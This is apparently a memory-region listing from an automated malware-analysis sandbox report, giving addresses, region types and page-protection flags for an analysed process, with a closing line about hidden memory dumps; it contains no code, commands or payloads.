page execute and read and write
30D1000
heap
page read and write
540F000
stack
page read and write
7FFD34876000
trusted library allocation
page execute and read and write
1B70E28E000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
1FF0E000
direct allocation
page execute and read and write
25A527F000
stack
page read and write
7DF469D20000
trusted library allocation
page execute and read and write
30D1000
heap
page read and write
7FFD34846000
trusted library allocation
page read and write
30D1000
heap
page read and write
1B70E25E000
heap
page read and write
2D9E000
stack
page read and write
7C1C000
heap
page read and write
29F7000
heap
page read and write
7C56000
heap
page read and write
243354F2000
heap
page read and write
1B70E24E000
heap
page read and write
2431B300000
heap
page read and write
30D1000
heap
page read and write
20ADD450000
heap
page read and write
2431D74C000
trusted library allocation
page read and write
30D1000
heap
page read and write
2EC8000
heap
page read and write
4DFA000
stack
page read and write
2CDD000
stack
page read and write
1B7100B8000
heap
page read and write
7CD0000
trusted library allocation
page read and write
271058E0000
trusted library allocation
page read and write
2431EBAE000
trusted library allocation
page read and write
30D1000
heap
page read and write
3670000
heap
page read and write
4D40000
heap
page read and write
1A5000
unkown
page read and write
30D1000
heap
page read and write
834F000
stack
page read and write
EFC000
stack
page read and write
30D1000
heap
page read and write
C47000
heap
page read and write
BD0000
direct allocation
page read and write
2DFA000
heap
page read and write
2FEDEFE000
stack
page read and write
42F8000
heap
page read and write
1B710051000
heap
page read and write
86A0000
direct allocation
page read and write
123F000
heap
page read and write
85CD000
stack
page read and write
2431EC0A000
trusted library allocation
page read and write
C4127FF000
stack
page read and write
30D7000
heap
page read and write
30D1000
heap
page read and write
BE0000
heap
page read and write
85E0000
trusted library allocation
page read and write
7FFD34A60000
trusted library allocation
page read and write
81C8000
heap
page read and write
6C1A000
stack
page read and write
42B0000
direct allocation
page read and write
1F6CF000
stack
page read and write
530000
unkown
page readonly
1B710025000
heap
page read and write
BC0000
unkown
page readonly
7FFD349F0000
trusted library allocation
page read and write
30D1000
heap
page read and write
2BFC000
stack
page read and write
1B71004E000
heap
page read and write
1B71001D000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
7FFD347B0000
trusted library allocation
page read and write
4332000
heap
page read and write
30D1000
heap
page read and write
1B70E227000
heap
page read and write
2DE0000
heap
page read and write
2FEE3FE000
stack
page read and write
33B4000
heap
page read and write
1FD5F000
heap
page read and write
7BEE000
heap
page read and write
1B710390000
heap
page read and write
30D1000
heap
page read and write
4355000
heap
page read and write
2FEE0FF000
stack
page read and write
2431CD74000
heap
page read and write
71BC000
heap
page read and write
461C000
stack
page read and write
81B0000
heap
page read and write
1B70E35E000
heap
page read and write
1B70FF5C000
heap
page read and write
1B70E1F0000
heap
page read and write
1B70E22D000
heap
page read and write
1F9CC000
stack
page read and write
30D1000
heap
page read and write
78E000
stack
page read and write
2C80000
heap
page read and write
27105C00000
trusted library allocation
page read and write
7FFD34790000
trusted library allocation
page read and write
71C0000
heap
page read and write
1B70E252000
heap
page read and write
7FFD34930000
trusted library allocation
page read and write
30D1000
heap
page read and write
71CC000
heap
page read and write
1B70E260000
heap
page read and write
100E000
stack
page read and write
20ADD380000
heap
page read and write
46D8000
trusted library allocation
page read and write
1B710035000
heap
page read and write
29E0000
trusted library allocation
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
7570000
trusted library allocation
page read and write
30D1000
heap
page read and write
8FC000
stack
page read and write
2431B3F0000
heap
page read and write
2431E54E000
trusted library allocation
page read and write
27105C03000
trusted library allocation
page read and write
7FFD34AC0000
trusted library allocation
page read and write
6D1A000
stack
page read and write
1B710061000
heap
page read and write
8FC000
stack
page read and write
1B70FF66000
heap
page read and write
4355000
heap
page read and write
33B8000
heap
page read and write
1B710011000
heap
page read and write
8110000
trusted library allocation
page read and write
EFC000
stack
page read and write
30D1000
heap
page read and write
2C8E000
stack
page read and write
30A0000
heap
page read and write
29F0000
heap
page read and write
271040E1000
heap
page read and write
30D1000
heap
page read and write
CC0000
heap
page read and write
24335384000
heap
page read and write
328B000
heap
page read and write
1FA10000
heap
page read and write
510000
unkown
page readonly
306E000
stack
page read and write
1B710071000
heap
page read and write
6B95000
heap
page execute and read and write
3F98000
unkown
page execute and read and write
30D1000
heap
page read and write
434D000
heap
page read and write
BD0000
heap
page read and write
8630000
direct allocation
page read and write
4345000
heap
page read and write
1011000
unkown
page readonly
7126000
heap
page read and write
30D1000
heap
page read and write
BB0000
unkown
page readonly
2431B312000
heap
page read and write
2780000
unkown
page execute and read and write
434D000
heap
page read and write
546E000
stack
page read and write
7FFD34980000
trusted library allocation
page execute and read and write
27103EE0000
system
page execute and read and write
BF0000
unkown
page read and write
4365000
heap
page read and write
2431B480000
trusted library allocation
page read and write
703E000
stack
page read and write
7F57000
stack
page read and write
558C000
stack
page read and write
2CE0000
heap
page readonly
1B70E1FB000
heap
page read and write
2431B2B0000
heap
page read and write
830E000
stack
page read and write
2C09000
trusted library allocation
page read and write
86F0000
direct allocation
page read and write
27105C16000
trusted library allocation
page read and write
30D1000
heap
page read and write
69FE000
stack
page read and write
2C7B000
stack
page read and write
30D1000
heap
page read and write
1F6D6FC0000
heap
page read and write
9F30000
direct allocation
page execute and read and write
7C26000
heap
page read and write
3FE6000
unclassified section
page read and write
74C0000
trusted library allocation
page read and write
1B70E358000
heap
page read and write
24335480000
heap
page read and write
B00000
unkown
page readonly
2D3C000
heap
page read and write
243352CA000
heap
page read and write
419BFF000
unkown
page read and write
1B710010000
heap
page read and write
30D1000
heap
page read and write
1B70E222000
heap
page read and write
7BF1000
heap
page read and write
20041000
direct allocation
page execute and read and write
1B70E250000
heap
page read and write
1FA11000
heap
page read and write
243354A9000
heap
page read and write
1320000
unkown
page readonly
30D1000
heap
page read and write
30A5000
heap
page read and write
52CE000
stack
page read and write
1B710020000
heap
page read and write
2DC0000
heap
page read and write
840E000
stack
page read and write
435F000
heap
page read and write
1B70E35A000
heap
page read and write
2003D000
direct allocation
page execute and read and write
30D1000
heap
page read and write
2DDF000
stack
page read and write
1060000
heap
page read and write
29E4000
trusted library allocation
page read and write
4CA0000
heap
page read and write
1B70E22A000
heap
page read and write
7FFD34A80000
trusted library allocation
page read and write
2990000
heap
page read and write
46E147E000
stack
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
21945000
unclassified section
page execute and read and write
7580000
trusted library allocation
page read and write
C40000
heap
page read and write
2C20000
trusted library allocation
page read and write
200C0000
unclassified section
page execute and read and write
6DBE000
stack
page read and write
520000
unkown
page readonly
1B7100A1000
heap
page read and write
27103F23000
system
page execute and read and write
1FA0C000
stack
page read and write
30D1000
heap
page read and write
7CC0000
trusted library allocation
page read and write
8360000
heap
page read and write
2C22000
trusted library allocation
page read and write
30D1000
heap
page read and write
6E3B000
stack
page read and write
3792000
unclassified section
page read and write
30D1000
heap
page read and write
1B70FC00000
heap
page read and write
1220000
heap
page read and write
8361000
heap
page read and write
6B90000
heap
page execute and read and write
81CD000
stack
page read and write
73DE000
stack
page read and write
2431B3AE000
heap
page read and write
29B0000
trusted library section
page read and write
2431CD81000
trusted library allocation
page read and write
1113000
system
page execute and read and write
BD0000
heap
page read and write
1B7100B8000
heap
page read and write
BD0000
direct allocation
page read and write
2DF5000
heap
page read and write
1060000
heap
page read and write
7FFD347EC000
trusted library allocation
page execute and read and write
2EC0000
heap
page read and write
2431B2F8000
heap
page read and write
1B70E223000
heap
page read and write
1B710086000
heap
page read and write
8040000
heap
page read and write
7BF3000
heap
page read and write
1B710081000
heap
page read and write
30D1000
heap
page read and write
BD0000
direct allocation
page read and write
3782000
direct allocation
page execute and read and write
1F6D70E0000
heap
page read and write
1B70FF5F000
heap
page read and write
31FF000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
2580000
heap
page read and write
16B1000
unkown
page readonly
74D0000
trusted library allocation
page read and write
47D5000
trusted library allocation
page read and write
1B710055000
heap
page read and write
7C21000
heap
page read and write
817E000
heap
page read and write
292E000
stack
page read and write
7FFD34A40000
trusted library allocation
page read and write
2431D298000
trusted library allocation
page read and write
A40000
unkown
page read and write
46E1AFE000
stack
page read and write
2E00000
heap
page read and write
1B710035000
heap
page read and write
1B7100B4000
heap
page read and write
2DFA000
heap
page read and write
190000
unkown
page readonly
2D00000
trusted library allocation
page read and write
1B71004E000
heap
page read and write
8374000
heap
page read and write
435E000
heap
page read and write
71F7000
trusted library allocation
page read and write
30D1000
heap
page read and write
836D000
heap
page read and write
302E000
stack
page read and write
1B710096000
heap
page read and write
1B70FF6B000
heap
page read and write
8F31000
trusted library allocation
page read and write
BD8000
heap
page read and write
4D69000
stack
page read and write
1B710086000
heap
page read and write
46E254E000
stack
page read and write
7F60000
heap
page read and write
1B70E226000
heap
page read and write
30D1000
heap
page read and write
8120000
heap
page read and write
580A000
trusted library allocation
page read and write
8172000
heap
page read and write
30D1000
heap
page read and write
191000
unkown
page execute read
5C0F000
stack
page read and write
4E7E000
stack
page read and write
5F0000
unkown
page readonly
7FFD34AD0000
trusted library allocation
page read and write
340E000
stack
page read and write
81C5000
heap
page read and write
7FFD347A0000
trusted library allocation
page read and write
30D1000
heap
page read and write
435A000
heap
page read and write
46E111E000
stack
page read and write
1B70E22A000
heap
page read and write
1B710051000
heap
page read and write
356D000
direct allocation
page execute and read and write
2C10000
trusted library allocation
page read and write
2DEE000
heap
page read and write
BF1000
heap
page read and write
1040000
unkown
page readonly
271040CC000
heap
page read and write
8382000
heap
page read and write
3227000
heap
page read and write
30D1000
heap
page read and write
7C61000
heap
page read and write
7340000
trusted library allocation
page read and write
1B70E21F000
heap
page read and write
2FEE4FE000
stack
page read and write
7FFD348B0000
trusted library allocation
page execute and read and write
7C55000
heap
page read and write
1B70FFA3000
heap
page read and write
46E25CE000
stack
page read and write
1B710019000
heap
page read and write
B7A000
stack
page read and write
1320000
unkown
page readonly
54AF000
stack
page read and write
1F8A0000
heap
page read and write
370D000
direct allocation
page execute and read and write
B10000
unkown
page readonly
2470000
unkown
page read and write
200B2000
direct allocation
page execute and read and write
2431E832000
trusted library allocation
page read and write
24335380000
heap
page read and write
4E5B000
stack
page read and write
30D1000
heap
page read and write
54EB000
stack
page read and write
27105DC4000
trusted library allocation
page read and write
510000
unkown
page readonly
30D1000
heap
page read and write
42AF000
stack
page read and write
30D1000
heap
page read and write
46E274B000
stack
page read and write
8640000
direct allocation
page read and write
2D99000
stack
page read and write
2DFA000
heap
page read and write
42C0000
direct allocation
page read and write
1B70E29D000
heap
page read and write
3250000
trusted library allocation
page read and write
27105A90000
heap
page read and write
113B000
system
page execute and read and write
2E33000
heap
page read and write
2DE4000
heap
page read and write
30D1000
heap
page read and write
4005000
unkown
page execute and read and write
1B70E252000
heap
page read and write
1B710044000
heap
page read and write
2D4A000
heap
page read and write
7FFD34794000
trusted library allocation
page read and write
1B70E0F0000
heap
page read and write
20ADEFE0000
heap
page read and write
2DE7000
heap
page read and write
6A7E000
stack
page read and write
2BBF000
stack
page read and write
816A000
heap
page read and write
86C0000
direct allocation
page read and write
1B7100AE000
heap
page read and write
2D10000
trusted library allocation
page execute and read and write
1B70E27F000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
8370000
heap
page read and write
7337000
trusted library allocation
page read and write
1B7100B8000
heap
page read and write
7FFD34A30000
trusted library allocation
page read and write
24335349000
heap
page read and write
30D1000
heap
page read and write
7FFD34B20000
trusted library allocation
page read and write
30D1000
heap
page read and write
2431EBA4000
trusted library allocation
page read and write
53CE000
stack
page read and write
70E0000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
1F68E000
stack
page read and write
641E000
stack
page read and write
1B71009E000
heap
page read and write
30D1000
heap
page read and write
80C6000
trusted library allocation
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
2EC5000
heap
page read and write
434D000
heap
page read and write
A9C7000
direct allocation
page execute and read and write
824F000
stack
page read and write
2431B39B000
heap
page read and write
27105DBE000
trusted library allocation
page read and write
1B710035000
heap
page read and write
30D1000
heap
page read and write
1B70E240000
heap
page read and write
6E40000
heap
page read and write
4EC0000
heap
page read and write
1B70E35C000
heap
page read and write
30D1000
heap
page read and write
70BF000
stack
page read and write
1B70E28E000
heap
page read and write
30D1000
heap
page read and write
820E000
stack
page read and write
2D70000
heap
page read and write
2431E86C000
trusted library allocation
page read and write
1F84E000
stack
page read and write
6ABE000
stack
page read and write
1B70E24B000
heap
page read and write
3180000
unkown
page execute and read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
31F7000
heap
page read and write
2C84000
heap
page read and write
7231000
heap
page read and write
30D1000
heap
page read and write
8060000
trusted library allocation
page read and write
1B70FF6B000
heap
page read and write
347F000
unkown
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
35D6000
unkown
page read and write
7FFD34941000
trusted library allocation
page read and write
2431D75B000
trusted library allocation
page read and write
30D1000
heap
page read and write
1F6D6DF0000
heap
page read and write
431F000
heap
page read and write
7BE4000
heap
page read and write
B10000
unkown
page readonly
8385000
heap
page read and write
1B71005C000
heap
page read and write
2431EDCB000
trusted library allocation
page read and write
3040000
heap
page read and write
419CFF000
stack
page read and write
2C7E000
stack
page read and write
1F6D70E5000
heap
page read and write
30D1000
heap
page read and write
7FFD34A90000
trusted library allocation
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
2D82000
unkown
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
20ADD3A0000
heap
page read and write
2D7B000
heap
page read and write
7BD4000
heap
page read and write
C4117FB000
stack
page read and write
24335323000
heap
page read and write
2431CD70000
heap
page read and write
1B710036000
heap
page read and write
4D20000
heap
page read and write
30D1000
heap
page read and write
2FEE2FF000
stack
page read and write
8660000
direct allocation
page read and write
1F78D000
stack
page read and write
BBE000
stack
page read and write
2E00000
heap
page read and write
30D1000
heap
page read and write
243352B0000
heap
page read and write
2431B450000
trusted library allocation
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
4EC0000
heap
page read and write
2431D30C000
trusted library allocation
page read and write
2DF4000
heap
page read and write
25A4FFC000
stack
page read and write
8130000
heap
page read and write
3280000
heap
page read and write
6A3E000
stack
page read and write
8620000
direct allocation
page read and write
435C000
heap
page read and write
2C84000
heap
page read and write
1F6D6D60000
heap
page read and write
29ED000
trusted library allocation
page execute and read and write
3390000
trusted library allocation
page read and write
2432D066000
trusted library allocation
page read and write
74A0000
trusted library allocation
page read and write
1220000
heap
page read and write
7FFD34972000
trusted library allocation
page read and write
BF0000
unkown
page read and write
19E000
unkown
page readonly
310E000
stack
page read and write
6BDD000
stack
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
3429000
heap
page read and write
1F2B0000
direct allocation
page read and write
27103FC0000
heap
page read and write
38AC000
unclassified section
page read and write
2431D5C5000
trusted library allocation
page read and write
3120000
heap
page read and write
7C48000
heap
page read and write
838B000
heap
page read and write
1B7100B4000
heap
page read and write
1B70E21E000
heap
page read and write
1B7100B8000
heap
page read and write
1FB35000
heap
page read and write
30C0000
heap
page read and write
30D1000
heap
page read and write
8050000
trusted library allocation
page execute and read and write
46E19FE000
stack
page read and write
7FFD349C0000
trusted library allocation
page read and write
30D1000
heap
page read and write
2DF0000
heap
page read and write
271058E0000
trusted library allocation
page read and write
9135000
trusted library allocation
page read and write
3A97000
remote allocation
page execute and read and write
2DD1000
heap
page read and write
790000
heap
page read and write
31E0000
heap
page read and write
296E000
stack
page read and write
30D1000
heap
page read and write
2433528D000
heap
page read and write
1B70E357000
heap
page read and write
30D1000
heap
page read and write
7510000
trusted library allocation
page read and write
3F32000
system
page read and write
1F70E000
stack
page read and write
707E000
stack
page read and write
2431D735000
trusted library allocation
page read and write
7BCF000
heap
page read and write
1B710031000
heap
page read and write
84CB000
stack
page read and write
8380000
heap
page read and write
46C6000
system
page read and write
7F80000
trusted library allocation
page read and write
435E000
heap
page read and write
1F93F000
stack
page read and write
31B8000
heap
page read and write
2CD0000
heap
page read and write
1B70E010000
heap
page read and write
30D1000
heap
page read and write
1B71002D000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
2D44000
heap
page read and write
1B71039F000
heap
page read and write
1B70FF50000
heap
page read and write
86D0000
direct allocation
page read and write
1F8FE000
stack
page read and write
530000
unkown
page readonly
7138000
heap
page read and write
322F000
heap
page read and write
46E26CA000
stack
page read and write
27105D01000
trusted library allocation
page read and write
1B70E26F000
heap
page read and write
30D1000
heap
page read and write
271058E0000
trusted library allocation
page read and write
2D44000
heap
page read and write
3201000
heap
page read and write
837D000
heap
page read and write
1B70E242000
heap
page read and write
3160000
heap
page read and write
1B710041000
heap
page read and write
2431D2C3000
trusted library allocation
page read and write
46E177E000
stack
page read and write
AF0000
unkown
page readonly
2C1A000
trusted library allocation
page execute and read and write
2431B470000
heap
page execute and read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
2D40000
heap
page read and write
30D1000
heap
page read and write
4670000
heap
page execute and read and write
803F000
stack
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
42D0000
direct allocation
page read and write
30D1000
heap
page read and write
1B7100B8000
heap
page read and write
11F0000
heap
page read and write
2E9C000
unkown
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
2431D713000
trusted library allocation
page read and write
5ACF000
stack
page read and write
8100000
trusted library allocation
page execute and read and write
30D1000
heap
page read and write
2431B290000
heap
page read and write
1A7000
unkown
page readonly
30D1000
heap
page read and write
7FFD34B10000
trusted library allocation
page read and write
A20000
unkown
page read and write
1B70E350000
heap
page read and write
9137000
trusted library allocation
page read and write
1B710393000
heap
page read and write
1B70FFD9000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
2D44000
heap
page read and write
31A0000
heap
page read and write
1B70E225000
heap
page read and write
1B71004E000
heap
page read and write
1B71003C000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
1B70E29C000
heap
page read and write
1B710018000
heap
page read and write
7F90000
trusted library allocation
page read and write
30D1000
heap
page read and write
5E0000
unkown
page readonly
BE0000
heap
page read and write
46E14FE000
stack
page read and write
1A7000
unkown
page readonly
20AC0000
unclassified section
page execute and read and write
2FEE6FB000
stack
page read and write
1B710011000
heap
page read and write
2690000
unkown
page readonly
30D1000
heap
page read and write
844C000
stack
page read and write
2D82000
unkown
page read and write
2431B1B0000
heap
page read and write
1B71004E000
heap
page read and write
30D1000
heap
page read and write
A70000
heap
page read and write
2431B430000
trusted library allocation
page read and write
30D0000
heap
page read and write
1228000
heap
page read and write
30D1000
heap
page read and write
24335549000
heap
page read and write
30D1000
heap
page read and write
1B70FF59000
heap
page read and write
8383000
heap
page read and write
1B70E1FC000
heap
page read and write
1B70E276000
heap
page read and write
858E000
stack
page read and write
30D1000
heap
page read and write
24335460000
heap
page execute and read and write
CCE000
stack
page read and write
1B710020000
heap
page read and write
7FFD349B0000
trusted library allocation
page read and write
30D1000
heap
page read and write
1B70E26D000
heap
page read and write
2431B340000
heap
page read and write
528E000
stack
page read and write
2431B2F0000
heap
page read and write
30D1000
heap
page read and write
7320000
trusted library allocation
page read and write
C412FFF000
stack
page read and write
2431B4A5000
heap
page read and write
1B70E25C000
heap
page read and write
4355000
heap
page read and write
C0B000
stack
page read and write
7FFD34A10000
trusted library allocation
page read and write
3852000
unclassified section
page read and write
4359000
heap
page read and write
24C0000
heap
page read and write
27105DA9000
trusted library allocation
page read and write
30D1000
heap
page read and write
1B710049000
heap
page read and write
552C000
stack
page read and write
C411FFE000
stack
page read and write
7C86000
heap
page read and write
1B70E21B000
heap
page read and write
20ADD6C5000
heap
page read and write
1B71012A000
heap
page read and write
1B70E35A000
heap
page read and write
30D1000
heap
page read and write
29C0000
trusted library section
page read and write
7BF8000
heap
page read and write
C80000
heap
page read and write
1B70FF51000
heap
page read and write
1B70E265000
heap
page read and write
CD0000
unkown
page readonly
7C42000
heap
page read and write
7BDD000
heap
page read and write
30D1000
heap
page read and write
2433525C000
heap
page read and write
5E0000
unkown
page readonly
42E0000
direct allocation
page read and write
1B71001F000
heap
page read and write
2C00000
trusted library allocation
page read and write
1FA12000
heap
page read and write
243354D6000
heap
page read and write
85F0000
trusted library allocation
page read and write
4E9E000
stack
page read and write
112C000
system
page execute and read and write
7FFD34A50000
trusted library allocation
page read and write
8650000
direct allocation
page read and write
1B710039000
heap
page read and write
4DAD000
stack
page read and write
30D1000
heap
page read and write
27105DCE000
trusted library allocation
page read and write
7109000
heap
page read and write
7350000
trusted library allocation
page read and write
31E8000
heap
page read and write
59A000
stack
page read and write
3390000
trusted library allocation
page read and write
CB0000
heap
page read and write
11B0000
unkown
page read and write
AF0000
unkown
page readonly
7BD2000
heap
page read and write
700000
heap
page read and write
5D0000
unkown
page readonly
A70000
heap
page read and write
2584000
heap
page read and write
CAB000
stack
page read and write
2D44000
heap
page read and write
745E000
stack
page read and write
1B710391000
heap
page read and write
30D1000
heap
page read and write
2C90000
unkown
page readonly
837A000
heap
page read and write
30D1000
heap
page read and write
7FFD34B00000
trusted library allocation
page read and write
1B70E230000
heap
page read and write
46E1B7B000
stack
page read and write
1A5000
unkown
page read and write
19E000
unkown
page readonly
BD0000
unkown
page readonly
2C80000
heap
page read and write
31B0000
heap
page read and write
1040000
unkown
page readonly
2DFA000
heap
page read and write
7FFD34A00000
trusted library allocation
page read and write
27105C21000
trusted library allocation
page read and write
86B0000
direct allocation
page read and write
6FFE000
stack
page read and write
74B0000
trusted library allocation
page execute and read and write
1020000
unkown
page read and write
30D1000
heap
page read and write
435F000
heap
page read and write
30D1000
heap
page read and write
7540000
trusted library allocation
page read and write
30D1000
heap
page read and write
31FA000
heap
page read and write
7C52000
heap
page read and write
1B710091000
heap
page read and write
30D1000
heap
page read and write
6AFE000
stack
page read and write
30D1000
heap
page read and write
1020000
unkown
page read and write
1B70E35E000
heap
page read and write
2432D085000
trusted library allocation
page read and write
24335247000
heap
page execute and read and write
1FCEE000
heap
page read and write
30D1000
heap
page read and write
2580000
heap
page read and write
30D1000
heap
page read and write
2DC0000
heap
page read and write
30D1000
heap
page read and write
7129000
heap
page read and write
243352FF000
heap
page read and write
854C000
stack
page read and write
1B7100B8000
heap
page read and write
1F2A0000
direct allocation
page read and write
2DAC000
heap
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
1B70FF51000
heap
page read and write
7C75000
heap
page read and write
5B0E000
stack
page read and write
29E3000
trusted library allocation
page execute and read and write
6CDE000
stack
page read and write
30D1000
heap
page read and write
20ADD458000
heap
page read and write
30D1000
heap
page read and write
2FEE1FF000
stack
page read and write
1B70E28E000
heap
page read and write
2DA0000
heap
page read and write
B90000
direct allocation
page read and write
828E000
stack
page read and write
316F000
stack
page read and write
27105C13000
trusted library allocation
page read and write
4347000
heap
page read and write
A31000
unkown
page readonly
A40000
unkown
page read and write
BD0000
unkown
page readonly
46E1093000
stack
page read and write
1B7100B4000
heap
page read and write
1070000
system
page execute and read and write
1B71012A000
heap
page read and write
30D1000
heap
page read and write
1B70E268000
heap
page read and write
30D1000
heap
page read and write
1F6D6D50000
heap
page read and write
1F2C0000
direct allocation
page read and write
7FFD34793000
trusted library allocation
page execute and read and write
30D1000
heap
page read and write
1A5000
unkown
page read and write
2D40000
heap
page read and write
243357E0000
heap
page read and write
3569000
direct allocation
page execute and read and write
46E157D000
stack
page read and write
1B70E24C000
heap
page read and write
7FFD34AA0000
trusted library allocation
page read and write
1B7100B8000
heap
page read and write
70F5000
heap
page read and write
1061000
unkown
page readonly
71C3000
heap
page read and write
80A5000
trusted library allocation
page read and write
2C90000
unkown
page readonly
190000
unkown
page readonly
2D20000
trusted library allocation
page read and write
271040BA000
heap
page read and write
6D7E000
stack
page read and write
30D1000
heap
page read and write
2D44000
heap
page read and write
191000
unkown
page execute read
7330000
trusted library allocation
page read and write
30D1000
heap
page read and write
7F390000
trusted library allocation
page execute and read and write
4BF0000
heap
page read and write
1B710015000
heap
page read and write
2DF0000
direct allocation
page read and write
7C04000
heap
page read and write
1FE99000
direct allocation
page execute and read and write
6C9F000
stack
page read and write
7FFD3494A000
trusted library allocation
page read and write
7550000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
530F000
stack
page read and write
82CF000
stack
page read and write
32F0000
trusted library allocation
page execute and read and write
30D1000
heap
page read and write
7FFD34840000
trusted library allocation
page read and write
1B70E231000
heap
page read and write
1B70E22C000
heap
page read and write
30D1000
heap
page read and write
C45000
heap
page read and write
1F6D6DFB000
heap
page read and write
2584000
heap
page read and write
24334D8D000
heap
page read and write
30D1000
heap
page read and write
431D000
heap
page read and write
1A7000
unkown
page readonly
28E0000
heap
page read and write
1B71007C000
heap
page read and write
2431B2F2000
heap
page read and write
688000
stack
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
80B0000
trusted library allocation
page read and write
30D1000
heap
page read and write
30D1000
heap
page read and write
There are 1196 hidden memdumps, click here to show them.